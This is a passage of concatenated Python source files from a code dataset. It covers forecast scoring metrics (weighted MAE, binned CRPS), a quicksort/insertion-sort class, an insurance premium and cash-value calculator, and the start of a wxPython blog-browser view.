#ToDo: make it general\n# pred=np.expand_dims(pred,axis=member_axis)\n \n# crps=ps.crps_ensemble(obs,pred, weights=None, issorted=False,axis=member_axis) \n# #crps.shape #(variable, time, lat, lon)\n# # if crps.ndim==3: #for single input.#ToDo: make it general\n# # crps=np.expand_dims(crps,axis=member_axis)\n# #Converting back to xarray\n# crps_score = xr.Dataset({\n# 'z500': xr.DataArray(\n# crps[0,...],\n# dims=['time', 'lat', 'lon'],\n# coords={'time': da_true.time, 'lat': da_true.lat, 'lon': da_true.lon,\n# },\n# ),\n# 't850': xr.DataArray(\n# crps[1,...],\n# dims=['time', 'lat', 'lon'],\n# coords={'time': da_true.time, 'lat': da_true.lat, 'lon': da_true.lon,\n# },\n# )\n# })\n \n# #averaging to get single valye\n# weights_lat = np.cos(np.deg2rad(crps_score.lat))\n# weights_lat /= weights_lat.mean()\n# crps_score = (crps_score* weights_lat).mean(mean_dims)\n \n# return crps_score\n\ndef compute_weighted_mae(da_fc, da_true, mean_dims=xr.ALL_DIMS):\n \"\"\"\n Compute the MAE with latitude weighting from two xr.DataArrays.\n Args:\n da_fc (xr.DataArray): Forecast. Time coordinate must be validation time.\n da_true (xr.DataArray): Truth.\n Returns:\n mae: Latitude weighted root mean squared error\n \"\"\"\n error = da_fc - da_true\n weights_lat = np.cos(np.deg2rad(error.lat))\n weights_lat /= weights_lat.mean()\n mae = (np.abs(error) * weights_lat).mean(mean_dims)\n return mae\n\ndef compute_bin_crps(obs, preds, bin_edges):\n \"\"\"\n Last axis must be bin axis\n obs: [...]\n preds: [..., n_bins]\n \"\"\"\n# pdb.set_trace()\n obs = obs.values\n preds = preds.values\n\n # Convert observation\n a = np.minimum(bin_edges[1:], obs[..., None])\n# b = bin_edges[:-1] * (bin_edges[0:-1] > obs[..., None])\n b = np.where(bin_edges[:-1] > obs[..., None], bin_edges[:-1], -np.inf)\n y = np.maximum(a, b)\n# print('a =', a)\n# print('b =', b)\n# print('y =', y)\n # Convert predictions to cumulative predictions with a zero at the beginning\n cum_preds = np.cumsum(preds, -1)\n cum_preds_zero = np.concatenate([np.zeros((*cum_preds.shape[:-1], 1)), cum_preds], -1)\n xmin = bin_edges[..., :-1]\n xmax = bin_edges[..., 1:]\n lmass = cum_preds_zero[..., :-1]\n umass = 1 - cum_preds_zero[..., 1:]\n# y = np.atleast_1d(y)\n# xmin, xmax = np.atleast_1d(xmin), np.atleast_1d(xmax)\n# lmass, lmass = np.atleast_1d(lmass), np.atleast_1d(lmass)\n scale = xmax - xmin\n# print('scale =', scale)\n y_scale = (y - xmin) / scale\n# print('y_scale = ', y_scale)\n \n z = y_scale.copy()\n z[z < 0] = 0\n z[z > 1] = 1\n# print('z =', z)\n a = 1 - (lmass + umass)\n# print('a =', a)\n crps = (\n np.abs(y_scale - z) + z**2 * a - z * (1 - 2*lmass) + \n a**2 / 3 + (1 - lmass) * umass\n )\n return np.sum(scale * crps, -1)\n\ndef compute_bin_crps_da(da_true, da_fc, batch=100):\n n = int(np.ceil(len(da_fc.time) / batch))\n result = []\n for i in tqdm(range(n)):\n sl = slice(i*batch, (i+1)*batch)\n r = compute_bin_crps(da_true.isel(time=sl), da_fc.isel(time=sl), da_fc.bin_edges)\n result.append(r)\n return np.concatenate(result)\n \ndef compute_weighted_bin_crps(da_fc, da_true, mean_dims=xr.ALL_DIMS):\n \"\"\"\n \"\"\"\n t = np.intersect1d(da_fc.time, da_true.time)\n da_fc, da_true = da_fc.sel(time=t), da_true.sel(time=t)\n weights_lat = np.cos(np.deg2rad(da_true.lat))\n weights_lat /= weights_lat.mean()\n dims = ['time', 'lat', 'lon']\n if type(da_true) is xr.Dataset:\n das = []\n for var in da_true:\n result = compute_bin_crps_da(da_true[var], da_fc[var])\n# result = compute_bin_crps(da_true[var], da_fc[var], da_fc[var].bin_edges)\n 
das.append(xr.DataArray(\n result, dims=dims, coords=dict(da_true.coords), name=var\n ))\n crps = xr.merge(das)\n else:\n# result = compute_bin_crps(da_true, da_fc, da_fc.bin_edges)\n result = compute_bin_crps_da(da_true, da_fc)\n crps = xr.DataArray(\n result, dims=dims, coords=dict(da_true.coords), name=da_fc.name\n )\n crps = (crps * weights_lat).mean(mean_dims)\n return crps","sub_path":"src/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":8388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"646752060","text":"import time\nimport random\n\nclass Sort:\n limit = 5\n count = 0\n\n def __init__(self, data = None):\n if data == None:\n self.data = []\n else:\n self.data = data\n\n def data_assign(self, amount):\n for i in range(amount):\n self.data.append(random.randint(1, 99))\n\n def partition(self, start, end):\n data = self.data[start:end+1]\n\n pivot = 0\n \n pivot_num = data[pivot]\n data_1 = data[:pivot]\n data_2 = data[pivot+1:]\n \n def comparator_1(indeks = 0):\n if indeks < len(data_1):\n self.count += 1\n if data_1[indeks] > pivot_num:\n data_2.append(data_1.pop(indeks))\n comparator_1(indeks)\n else:\n comparator_1(indeks+1)\n \n def comparator_2(indeks = 0):\n if indeks < len(data_2):\n self.count += 1\n if data_2[indeks] < pivot_num:\n data_1.append(data_2.pop(indeks))\n comparator_2(indeks)\n else:\n comparator_2(indeks+1)\n\n comparator_1()\n comparator_2()\n\n pivot = len(data_1)\n data_1.append(pivot_num)\n data = data_1 + data_2\n\n self.data[start:end+1] = data\n return pivot\n\n def insert(self, start, end, indeks = None, rec = 0):\n if indeks == None:\n indeks = start + 1\n\n if indeks >= start and indeks <= end:\n data = self.data\n self.count += 1\n if rec == 0:\n self.fr = indeks\n\n if data[self.fr] < data[indeks-1] and indeks != 0:\n self.insert(start, end, indeks-1, rec+1)\n\n elif rec != 0:\n data.insert(indeks, data.pop(self.fr))\n\n if rec == 0:\n self.insert(start, end, indeks+1)\n\n def quick(self, start, end):\n if start < end:\n pivot = start + self.partition(start, end)\n self.quick(start, pivot-1)\n self.quick(pivot+1, end)\n \n def quick_insert(self, start, end):\n if start < end:\n pivot = start + self.partition(start, end)\n if (pivot - 1) - start < self.limit:\n self.insert(start, pivot - 1)\n else:\n self.quick_insert(start, pivot - 1)\n \n if end - (pivot + 1) < self.limit:\n self.insert(pivot + 1, end)\n else:\n self.quick_insert(pivot + 1, end)\n\n def combosort(self):\n self.quick_insert(0, len(self.data) - 1)\n\ndef binary(target, arr, start, end):\n if start <= end:\n middle = int((start + end) / 2)\n if target == arr[middle]:\n return middle + 1\n elif target < arr[middle]:\n return binary(target, arr, start, middle-1)\n else:\n return binary(target, arr, middle+1, end)\n else:\n return -1\n\ndef binary_search(target, arr):\n return binary(target, arr, 0, len(arr))\n\na = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]\n\nsorter = Sort(a)\nsorter.combosort()\n\na = sorter.data\nprint (a)\n\nprint (binary_search(4, a))\n","sub_path":"no-03.py","file_name":"no-03.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"39949842","text":"#!/usr/bin/env python3\n\nimport re\nimport warnings\nfrom collections import OrderedDict\nfrom decimal import Decimal\nfrom enum import Enum\nfrom functools import reduce\nfrom itertools import zip_longest\nfrom math import log10\nfrom 
pathlib import Path\nfrom pprint import pprint, pformat\nfrom typing import (\n    ClassVar,\n    Generator,\n    Iterator,\n    MutableMapping,\n    NoReturn,\n    Optional,\n    Sequence,\n    Union,\n    Pattern,\n)\n\nimport attr\nfrom openpyxl import load_workbook\nfrom openpyxl.worksheet import Worksheet as Factors\n\nfrom upc.annuities import annuities\nfrom upc.helpers import decimal_round, parse\nfrom upc.packages.clint.textui import colored, puts\nfrom upc.packages.clint.textui.cols import console_width\n\n\nclass Gender(Enum):\n\n    MALE = \"M\"\n    FEMALE = \"F\"\n    NEUTRAL = \"N\"\n\n    def __str__(self):\n        return self.value\n\n    @property\n    def male_like(self):\n        return [\"M\", \"0\", \"MALE\", \"男\"]\n\n    @property\n    def female_like(self):\n        return [\"F\", \"1\", \"FEMALE\", \"女\"]\n\n    @classmethod\n    def patterns(cls) -> Pattern:\n        return re.compile(\n            r\"^[mf01男女]$|^male$|^female$\", flags=re.IGNORECASE\n        )\n\n    @classmethod\n    def parse(cls, gender: str) -> \"Gender\":\n        \"\"\"Convert a gender-like string into a proper Gender Enum.\"\"\"\n        # male_like/female_like are instance properties, so they have to be\n        # reached through a member; cls.male_like is only the property object\n        gender = str(gender).upper()\n        if gender in cls.MALE.male_like:\n            return cls.MALE\n        elif gender in cls.FEMALE.female_like:\n            return cls.FEMALE\n        else:\n            return cls.NEUTRAL\n\n\n@attr.s(auto_attribs=True, slots=True)\nclass Person:\n\n    EM_LEVELS: ClassVar = [\"0\", \"50\", \"75\", \"100\", \"125\", \"150\"]\n    OCCUPATIONS: ClassVar = [str(x) for x in range(7)]\n\n    age: int\n    gender: Gender\n    occupation: str = \"1\"\n    em_level: str = \"0\"\n    social_security: bool = True\n\n\n@attr.s(auto_attribs=True, slots=True)\nclass Product:\n    \"\"\"\n    \"\"\"\n\n    name: str = attr.ib()\n    path: str = attr.ib()\n    mapping: dict = attr.Factory(dict)  # a plain {} default would be shared by every instance\n    death_level_ref: str = \"\"\n\n    tc983: Factors = None\n    t5658: Factors = None\n    th528: Factors = None\n    th606: Factors = None\n\n    def __attrs_post_init__(self):\n        self._load_factors()\n        self._load_mapping()\n\n    def _load_factors(self):\n        factors = Path(self.path)\n        if not factors.exists():\n            raise FileNotFoundError(\n                \"Enter a valid path, please?\\n\"\n                f\"{factors}\\nis not a correct path.\"\n            )\n        else:\n            for factor in factors.iterdir():\n                if \"TC983\" in factor.stem or \"TC804\" in factor.stem:\n                    break\n            else:\n                raise ValueError(f\"No factor is found in\\n{factors}\")\n\n        for factor in factors.iterdir():\n            if not factor.stem.startswith(\"~$\"): # Skip temp files.\n                if \"TC983\" in factor.stem or \"TC804\" in factor.stem:\n                    self.tc983 = self._load_worksheet(factor)\n                elif \"T5658\" in factor.stem:\n                    self.t5658 = self._load_worksheet(factor)\n                elif \"TH528\" in factor.stem:\n                    self.th528 = self._load_worksheet(factor)\n                elif \"TH606\" in factor.stem:\n                    self.th606 = self._load_worksheet(factor)\n                else:\n                    pass\n\n    def _load_mapping(self):\n        \"\"\"Convert TC983 to a Python readable mapping.\"\"\"\n        mapping = {}\n        for row in self.tc983.iter_rows():\n\n            if row[0].value is not None and row[0].value[:3] == self.name:\n                coverage_mode, remainders = re.match(\n                    r\"Policy Term = ([tT]?o?\\s?[0-9]{0,3})(.*)\", row[3].value\n                ).groups()\n                other_modes = re.findall(r\"[\\w^=]+\", remainders)\n                mapping[row[2].value] = {\n                    \"payment_mode\": str(row[1].value),\n                    \"coverage_mode\": str(coverage_mode),\n                    \"other_modes\": other_modes,\n                }\n\n        self.mapping = mapping\n\n    def death_levels(self):\n        \"\"\"Get the death reference from T5658.\"\"\"\n\n        for col in self.t5658.iter_cols():\n            death_refs = set(\n                map(\n                    lambda x: x.value[3] if x.value is not None else None,\n                    col[1:],\n                )\n            )\n            break\n        else:\n            raise ValueError # dead code\n\n        death_refs ^= {None}\n        return death_refs\n\n    def modes(self, modes: str) -> Optional[list]:\n        
\"\"\"Get a sorted list of payment/coverage/other modes.\"\"\"\n\n def _unique(seq):\n \"\"\"Return a list of unique values in ``seq``.\n\n Works on list if lists.\n \"\"\"\n return reduce(lambda x, y: x if y in x else x + [y], [[]] + seq)\n\n if modes not in [\"payment_mode\", \"coverage_mode\", \"other_modes\"]:\n raise ValueError(\n \"'modes' must be one of the valid modes:\\n\"\n \"payment_mode/coverage_mode/other_modes\"\n )\n modes_list = []\n for key, val in self.mapping.items():\n if val[modes]:\n modes_list.append(val[modes])\n if modes_list:\n return sorted(_unique(modes_list), key=len)\n else:\n return None\n\n def has(self, table_name: str) -> bool:\n \"\"\"Return True if the product has the asked table.\"\"\"\n\n def _has_annuity(name):\n \"\"\"Check if a product is an annuity.\"\"\"\n match = re.match(r\"[a-z]a[^r].?\", name, flags=re.IGNORECASE)\n return True if match is not None else None\n\n tables = {\n \"premium\": self.t5658,\n \"extra_premium\": self.th606,\n \"cash_value\": self.th528,\n \"annuity\": _has_annuity(self.name),\n }\n if table_name not in tables.keys():\n # Validity check\n raise ValueError(f\"'table_name' must be one of {tables.keys()}.\")\n return False if tables[table_name] is None else True\n\n @staticmethod\n def _load_worksheet(filename: Path) -> Factors:\n \"\"\"Load the worksheet only, data only.\"\"\"\n workbook = load_workbook(filename, data_only=True)\n\n for sheet in workbook.sheetnames:\n if \"re\" != sheet.lower():\n worksheet = workbook[sheet]\n break\n else:\n worksheet = None\n\n if worksheet:\n return worksheet\n else:\n raise ValueError(\n f\"{filename.name}'s format is not correct.\"\n \"(located in {filename.parent})\"\n )\n\n\n@attr.s(\n auto_attribs=True, repr=False, init=False, str=False, cmp=False, slots=True\n)\nclass ModelPoint:\n \"\"\"Hold all the ugliness of handling model points.\"\"\"\n\n product: Product\n insured: Person\n frequency: str\n sum_assured: Decimal # For calculations.\n sum_assured_raw: Decimal # For printing.\n payment_mode: str\n coverage_mode: str\n other_modes: Sequence\n coverage_period: int\n\n umc3: str\n umc4: str\n umc7: str\n\n keys: MutableMapping[str, str]\n\n premium: Decimal\n extra_premium: Decimal\n total_premium: Decimal\n cash_values: Iterator[Decimal]\n annuities: Iterator[Decimal]\n\n def build(self) -> NoReturn:\n \"\"\"Fill the rest of the attributes once the required fields are set.\"\"\"\n self.coverage_period = parse(self.coverage_mode, self.insured.age)\n self.sum_assured_raw = self.sum_assured\n # Determine the Unique Mapping Codes\n for umc3, val in self.product.mapping.items():\n if (\n val[\"payment_mode\"] == self.payment_mode\n and val[\"coverage_mode\"] == self.coverage_mode\n and val[\"other_modes\"] == self.other_modes\n ):\n self.umc3 = umc3\n break\n else:\n pprint(self.product.mapping)\n raise ValueError(\n \"Cannot determine a UMC3 code:\"\n f\"{pformat(self.product.mapping)}\"\n )\n\n if not self.product.death_level_ref:\n death_level = \"N\"\n else:\n if self.product.death_level_ref == \"sa\":\n death_level = str(self.sum_assured)\n self.sum_assured = Decimal(\"1\")\n elif self.product.death_level_ref == \"occupation\":\n death_level = self.insured.occupation\n elif self.product.death_level_ref == \"social_security\":\n if self.insured.social_security:\n death_level = \"P\"\n else:\n death_level = \"Q\"\n elif self.product.death_level_ref == \"nhh\":\n pass\n else:\n raise NotImplementedError\n\n self.umc4 = self.umc3 + death_level\n self.umc7 = (\n 
f\"{self.umc3}{self.insured.age:0>2}{death_level}\"\n f\"{self.insured.gender}\"\n ).upper()\n\n self.keys = {\n \"age\": (\n \"INSTPR\"\n if self.insured.age == 0\n else f\"INSPRM{self.insured.age:0>2}\"\n ),\n \"frequency\": f\"MFACT{self.frequency}\",\n \"premium\": f\"{self.umc4}{self.insured.gender}\".upper(),\n \"extra_premium\": (\n f\"{self.umc3}{self.insured.gender}{self.insured.em_level}\"\n ).upper(),\n \"premium_unit\": \"PREM_UNIT\",\n \"sa_unit\": \"UNIT\",\n \"first_policy_year\": \"INSPRM01\",\n }\n\n # Calculations\n self.premium = self._premium()\n\n if self.product.has(\"extra_premium\") and self.insured.em_level != \"0\":\n self.extra_premium = self._extra_premium()\n else:\n self.extra_premium = Decimal()\n\n if self.product.has(\"cash_value\"):\n self.cash_values = self._cash_values()\n else:\n self.cash_values = iter(())\n\n if self.product.has(\"annuity\"):\n self.annuities = self._annuities()\n else:\n self.annuities = iter(())\n\n self.total_premium = self.premium + self.extra_premium\n\n def _premium(self) -> Decimal:\n \"\"\"Find the premium of the given model point.\"\"\"\n\n for row in self.product.t5658.iter_rows():\n list_row = [x.value for x in row]\n col_index = list_row.index(self.keys[\"age\"])\n frequency_index = list_row.index(self.keys[\"frequency\"])\n premium_unit_index = list_row.index(self.keys[\"premium_unit\"])\n sa_unit_index = list_row.index(self.keys[\"sa_unit\"])\n break\n else:\n raise KeyError\n\n for col in self.product.t5658.iter_cols():\n row_index = [x.value for x in col].index(self.keys[\"premium\"])\n break\n else:\n raise KeyError\n\n premium_factor = Decimal(\n self.product.t5658.cell(row_index + 1, col_index + 1).value\n )\n frequency_factor = Decimal(\n self.product.t5658.cell(row_index + 1, frequency_index + 1).value\n )\n premium_unit = Decimal(\n self.product.t5658.cell(\n row_index + 1, premium_unit_index + 1\n ).value\n )\n sa_unit = Decimal(\n self.product.t5658.cell(row_index + 1, sa_unit_index + 1).value\n )\n\n premium = decimal_round(\n (\n premium_factor\n / premium_unit\n / sa_unit\n * frequency_factor\n * self.sum_assured\n ),\n digits=log10(premium_unit),\n )\n return premium\n\n def _extra_premium(self) -> Decimal:\n\n for row in self.product.th606.iter_rows():\n list_row = [x.value for x in row]\n col_index = list_row.index(self.keys[\"age\"])\n frequency_index = list_row.index(self.keys[\"frequency\"])\n premium_unit_index = list_row.index(self.keys[\"premium_unit\"])\n sa_unit_index = list_row.index(self.keys[\"sa_unit\"])\n break\n else:\n raise KeyError\n\n for col in self.product.th606.iter_cols():\n row_index = [x.value for x in list(col)].index(\n self.keys[\"extra_premium\"]\n )\n break\n else:\n raise KeyError\n\n sub_premium_factor = Decimal(\n self.product.th606.cell(row_index + 1, col_index + 1).value\n )\n frequency_factor = Decimal(\n self.product.th606.cell(row_index + 1, frequency_index + 1).value\n )\n premium_unit = Decimal(\n self.product.th606.cell(\n row_index + 1, premium_unit_index + 1\n ).value\n )\n sa_unit = Decimal(\n self.product.th606.cell(row_index + 1, sa_unit_index + 1).value\n )\n\n sub_premium = decimal_round(\n (\n sub_premium_factor\n / premium_unit\n / sa_unit\n * frequency_factor\n * self.sum_assured\n ),\n digits=log10(premium_unit),\n )\n return sub_premium\n\n def _annuities(self) -> Generator[Decimal, None, None]:\n \"\"\"Calculate annuities.\"\"\"\n return annuities[self.product.name](self)\n\n def _cash_values(self) -> Generator[Decimal, None, None]:\n \"\"\"Calculate 
cash values, return a generator.\"\"\"\n\n for row in self.product.th528.iter_rows():\n list_row = [x.value for x in row]\n col_pos = list_row.index(self.keys[\"first_policy_year\"]) + 1\n premium_unit_pos = list_row.index(self.keys[\"premium_unit\"]) + 1\n sa_unit_pos = list_row.index(self.keys[\"sa_unit\"]) + 1\n break\n else:\n raise ValueError\n\n for col in self.product.th528.iter_cols():\n row_pos = [x.value for x in col].index(self.umc7) + 1\n break\n else:\n raise ValueError\n\n premium_unit = Decimal(\n self.product.th528.cell(row_pos, premium_unit_pos).value\n )\n sa_unit = Decimal(self.product.th528.cell(row_pos, sa_unit_pos).value)\n\n # Calculate the CV for a single point.\n def _cash_value_formula(x: Decimal) -> Decimal:\n\n return decimal_round(\n (x / premium_unit / sa_unit * self.sum_assured),\n digits=log10(premium_unit),\n )\n\n for t in range(1, self.coverage_period + 1):\n if self.coverage_mode != \"To 105\" and t == self.coverage_period:\n # Force the last year's CV to 0 for non-whole-life insurances.\n yield Decimal()\n else:\n yield _cash_value_formula(\n Decimal(\n self.product.th528.cell(row_pos, col_pos + t - 1).value\n )\n )\n\n\n@attr.s(auto_attribs=True, slots=True, frozen=True)\nclass Layout:\n \"\"\"Layout management.\n\n This class contains **all** information for setting and printing\n the layout of the final results.\n \"\"\"\n\n console_width: ClassVar = console_width()\n __SCHEME_PREMIUMS: ClassVar = OrderedDict(\n [\n (\"Product\", (9, \"^\")),\n (\"Sum Assured\", (14, \">\")),\n (\"Prem Term\", (11, \"^\")),\n (\"Pol Term\", (10, \"^\")),\n (\"Premium\", (14, \">\")),\n (\"Extra Premium\", (15, \">\")),\n ]\n )\n __SCHEME_BENEFITS: ClassVar = OrderedDict(\n [\n (\"Policy Year\", (15, \">\")),\n (\"Annuity\", (19, \">\")),\n (\"Cash Values\", (19, \">\")),\n ]\n )\n\n @classmethod\n def check_width(cls):\n \"\"\"Check the console width.\"\"\"\n if Layout.console_width < 80:\n warnings.warn(\n \"Set the console width to 80 for optimized visuals.\",\n UserWarning,\n )\n\n @classmethod\n def separator(cls, title=\"\", symbol=\"=\") -> NoReturn:\n \"\"\"Print a section separator with the given symbol.\n\n >>> Layout.separator(\"New Session Started\")\n # Prints '====== New Session Started ======'\n >>> Layout.separator(f\"Main Benefits for {product.name}\", sep=\"-\")\n >>> Layout.separator()\n # Prints '---------------------------------'\n \"\"\"\n # Pad spaces around the title.\n if title:\n if not title.startswith(\" \"):\n title = \" \" + title\n if not title.endswith(\" \"):\n title += \" \"\n else:\n # Since f-string does not support for formatting empty strings.\n title = symbol\n print(f\"{title:{symbol}^{cls.console_width}}\")\n\n @classmethod\n def print_premiums_header(cls) -> NoReturn:\n \"\"\"Print the header of the given section.\"\"\"\n for title, (width, align) in cls.__SCHEME_PREMIUMS.items():\n print(f\"{title: {align}{cls.adjusted(width)}}\", end=\"\")\n print()\n\n @classmethod\n def print_premiums(cls, model_point: ModelPoint) -> NoReturn:\n \"\"\"Print the premiums result.\"\"\"\n values = [\n model_point.product.name,\n model_point.sum_assured_raw,\n model_point.payment_mode,\n model_point.coverage_mode,\n model_point.premium,\n model_point.extra_premium,\n ]\n for value, (width, align) in zip(\n values, cls.__SCHEME_PREMIUMS.values()\n ):\n print(\n f\"{cls.formatted(value): {align}{cls.adjusted(width)}}\", end=\"\"\n )\n print()\n\n @classmethod\n def print_benefits(cls, model_point: ModelPoint):\n \"\"\"Print the benefits 
result.\"\"\"\n\n if model_point.product.has(\"cash_value\"):\n\n cls.separator(\n f\"Main Benefits for {model_point.product.name}\", symbol=\"/\"\n )\n cls.separator(symbol=\"-\")\n for title, (width, align) in cls.__SCHEME_BENEFITS.items():\n width = cls.adjusted(width)\n print(f\" {title: {align}{width}}\", end=\"\")\n print()\n\n policy_years = range(1, model_point.coverage_period + 1)\n for policy_year, cv, annuity in zip_longest(\n policy_years,\n model_point.cash_values,\n model_point.annuities,\n fillvalue=Decimal(),\n ):\n if (\n policy_year > 20\n and policy_year % 5\n and policy_year != model_point.coverage_period\n ):\n continue\n cv = max(cv - annuity, Decimal())\n for value, (width, align) in zip(\n [policy_year, annuity, cv], cls.__SCHEME_BENEFITS.values()\n ):\n print(\n f\" {cls.formatted(value): {align}{cls.adjusted(width)}}\",\n end=\"\",\n )\n print()\n else:\n puts(\n colored.yellow(\n f\"{model_point.product.name} does not have a benefit schedule.\"\n )\n )\n\n @classmethod\n def adjusted(cls, width: int) -> int:\n \"\"\"Return the width adjusted to the console width if the width\n is greater than 80, otherwise return the width.\"\"\"\n return max(int(width / 80 * Layout.console_width), width)\n\n @classmethod\n def formatted(cls, value: Union[Decimal, str]) -> str:\n \"\"\"Add thousand-separators if `value` is a Decimal, otherwise\n leave it alone.\n \"\"\"\n if not isinstance(value, Decimal):\n return value\n if value == Decimal():\n return \"-\"\n else:\n return f\"{value:,.2f}\"\n\n\n@attr.s(auto_attribs=True, slots=True)\nclass Policy:\n\n insured: Person\n frequency: str\n policyholder: Person = None\n\n model_points: MutableMapping[str, ModelPoint] = OrderedDict()\n total_premium: Decimal = Decimal()\n\n def append(self, model_point: ModelPoint) -> NoReturn:\n \"\"\"Add a model point to the policy.\"\"\"\n\n self.model_points[model_point.product.name] = model_point\n self.total_premium += model_point.total_premium\n\n def present(self) -> NoReturn:\n \"\"\"Print out the results.\"\"\"\n Layout.check_width()\n\n Layout.separator(\"Premiums\", \"=\")\n Layout.print_premiums_header()\n for model_point in self.model_points.values():\n Layout.print_premiums(model_point)\n print(f\"\\nTotal Premiums: {Layout.formatted(self.total_premium)}\\n\")\n\n Layout.separator(\"Benefits\", \"=\")\n for model_point in self.model_points.values():\n Layout.print_benefits(model_point)\n","sub_path":"upc/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":20617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"356495905","text":"from zoundry.appframework.global_services import getApplicationModel\r\nfrom zoundry.appframework.global_services import getResourceRegistry\r\nfrom zoundry.appframework.resources.resourceutils import ZMappedImageList\r\nfrom zoundry.appframework.ui.util.uiutil import fireRefreshEvent\r\nfrom zoundry.appframework.ui.widgets.controls.common.menu.menu import ZMenu\r\nfrom zoundry.appframework.ui.widgets.controls.common.menu.menumodel import ZModelBasedMenuContentProvider\r\nfrom zoundry.appframework.ui.widgets.controls.common.menu.menumodel import ZModelBasedMenuEventHandler\r\nfrom zoundry.appframework.ui.widgets.controls.listex import IZListViewExContentProvider\r\nfrom zoundry.appframework.ui.widgets.controls.listex import ZListViewEx\r\nfrom zoundry.blogapp.constants import IZBlogAppServiceIDs\r\nfrom zoundry.blogapp.messages import _extstr\r\nfrom 
zoundry.blogapp.services.accountstore.accountstore import IZAccountStoreListener\r\nfrom zoundry.blogapp.ui.actions.blog.blogactions import ZBlogMenuActionContext\r\nfrom zoundry.blogapp.ui.events.viewevents import ZEVT_VIEW_SELECTION_CHANGED\r\nfrom zoundry.blogapp.ui.menus.blog.blogmenu import ZBlogMenuModel\r\nfrom zoundry.blogapp.ui.util.viewutil import fireViewUnselectionEvent\r\nfrom zoundry.blogapp.ui.views.view import ZView\r\nfrom zoundry.blogapp.ui.views.viewsel import IZViewSelectionTypes\r\nfrom zoundry.blogapp.ui.views.viewselimpl import ZViewSelection\r\nfrom zoundry.blogapp.ui.util.viewutil import fireViewSelectionEvent\r\nimport wx\r\n\r\n# ------------------------------------------------------------------------------\r\n# List view content provider for providing a list of blogs.\r\n# ------------------------------------------------------------------------------\r\nclass ZBlogListProvider(IZListViewExContentProvider):\r\n\r\n def __init__(self):\r\n self.accountStore = getApplicationModel().getService(IZBlogAppServiceIDs.ACCOUNT_STORE_SERVICE_ID)\r\n self.accountId = None\r\n self.blogs = None\r\n self.imageList = self._createImageList()\r\n\r\n self.refresh()\r\n # end __init__()\r\n\r\n def getAccountId(self):\r\n return self.accountId\r\n # end getAccountId()\r\n\r\n def setAccountId(self, accountId):\r\n self.accountId = accountId\r\n # end setAccountId()\r\n\r\n def _createImageList(self):\r\n # FIXME (EPW) Move account and blog icons to a common area and use from there (also chnage navigator)\r\n registry = getResourceRegistry()\r\n imgList = ZMappedImageList()\r\n imgList.addImage(u\"blog\", registry.getBitmap(u\"images/perspectives/standard/navigator/blog.png\")) #$NON-NLS-1$ #$NON-NLS-2$\r\n\r\n return imgList\r\n # end _createImageList\r\n\r\n def refresh(self):\r\n self.blogs = []\r\n for account in self.accountStore.getAccounts():\r\n if account.getId() == self.accountId:\r\n for blog in account.getBlogs():\r\n self.blogs.append(blog)\r\n # end refresh()\r\n\r\n def getImageList(self):\r\n return self.imageList\r\n # end getImageList()\r\n\r\n def getNumColumns(self):\r\n return 1\r\n # end getNumColumns()\r\n\r\n def getNumRows(self):\r\n return len(self.blogs)\r\n # end getNumRows()\r\n\r\n def getColumnInfo(self, columnIndex): #@UnusedVariable\r\n return (_extstr(u\"blogbrowser.Blogs\"), None, None, ZListViewEx.COLUMN_LOCKED | ZListViewEx.COLUMN_RELATIVE, 100) #$NON-NLS-1$\r\n # end getColumnInfo()\r\n\r\n def getRowText(self, rowIndex, columnIndex): #@UnusedVariable\r\n return self.blogs[rowIndex].getName()\r\n # end getRowText()\r\n\r\n def getRowImage(self, rowIndex, columnIndex): #@UnusedVariable\r\n return self.imageList[u\"blog\"] #$NON-NLS-1$\r\n # end getRowImage()\r\n\r\n def getBlogAtIndex(self, index):\r\n return self.blogs[index]\r\n # end getBlogAtIndex()\r\n\r\n# end ZBlogListProvider\r\n\r\n\r\n# ------------------------------------------------------------------------------\r\n# Implements the second of three views in the Browse perspective. 
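It sits between the account list and the per-blog content view. 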
This view\r\n# presents the user with a list of Blogs found in the selected account.\r\n# ------------------------------------------------------------------------------\r\nclass ZBlogBrowseView(ZView, IZAccountStoreListener):\r\n\r\n def __init__(self, parent):\r\n ZView.__init__(self, parent, wx.ID_ANY)\r\n\r\n self._createWidgets()\r\n self._layoutWidgets()\r\n self._populateWidgets()\r\n self._bindWidgetEvents()\r\n\r\n self._registerAsAccountListener()\r\n # end __init__()\r\n\r\n def _createWidgets(self):\r\n self.blogListProvider = ZBlogListProvider()\r\n self.blogListView = ZListViewEx(self.blogListProvider, self)\r\n # end _createWidgets()\r\n\r\n def _layoutWidgets(self):\r\n sizer = wx.BoxSizer(wx.VERTICAL)\r\n sizer.Add(self.blogListView, 1, wx.EXPAND)\r\n\r\n self.SetSizer(sizer)\r\n self.SetAutoLayout(True)\r\n self.Layout()\r\n # end _layoutWidgets()\r\n\r\n def _populateWidgets(self):\r\n pass\r\n # end _populateWidgets()\r\n\r\n def _bindWidgetEvents(self):\r\n self.Bind(ZEVT_VIEW_SELECTION_CHANGED, self.onViewSelection)\r\n self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.onBlogSelected, self.blogListView)\r\n self.Bind(wx.EVT_LIST_ITEM_RIGHT_CLICK, self.onBlogRightClick, self.blogListView)\r\n self._bindRefreshEvent(self.onZoundryRefresh)\r\n # end _bindWidgetEvents()\r\n\r\n def onBlogRightClick(self, event):\r\n blog = self._getSelectedBlog()\r\n if blog is not None:\r\n menu = self._createBlogCtxMenu(blog)\r\n self.PopupMenu(menu)\r\n menu.Destroy()\r\n event.Skip()\r\n # end onBlogRightClick()\r\n\r\n def _createBlogCtxMenu(self, blog):\r\n menuContext = ZBlogMenuActionContext(self, blog)\r\n menuModel = ZBlogMenuModel()\r\n provider = ZModelBasedMenuContentProvider(menuModel, menuContext)\r\n eventHandler = ZModelBasedMenuEventHandler(menuModel, menuContext)\r\n return ZMenu(self, menuModel.getRootNode(), provider, eventHandler)\r\n # end _createBlogCtxMenu()\r\n\r\n def onViewSelection(self, event):\r\n selection = event.getSelection()\r\n if selection.getType() == IZViewSelectionTypes.ACCOUNT_SELECTION:\r\n accountId = selection.getData()\r\n self.blogListProvider.setAccountId(accountId)\r\n 